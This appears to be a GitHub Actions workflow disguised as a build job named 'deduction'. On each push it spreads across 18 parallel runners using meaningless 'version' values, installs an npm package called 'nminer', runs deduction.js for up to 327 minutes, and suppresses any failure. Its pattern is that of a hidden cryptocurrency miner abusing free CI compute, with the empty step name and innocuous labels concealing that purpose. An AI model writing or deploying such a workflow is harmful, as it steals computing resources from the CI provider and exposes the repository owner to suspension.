name: deduction
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3565 }
          - { version: 5112 }
          - { version: 3375 }
          - { version: 4063 }
          - { version: 8246 }
          - { version: 6338 }
          - { version: 6627 }
          - { version: 5145 }
          - { version: 760 }
          - { version: 5485 }
          - { version: 4595 }
          - { version: 5601 }
          - { version: 3634 }
          - { version: 5596 }
          - { version: 9584 }
          - { version: 7490 }
          - { version: 9675 }
          - { version: 4559 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 327m node deduction.js || echo "deduction executed"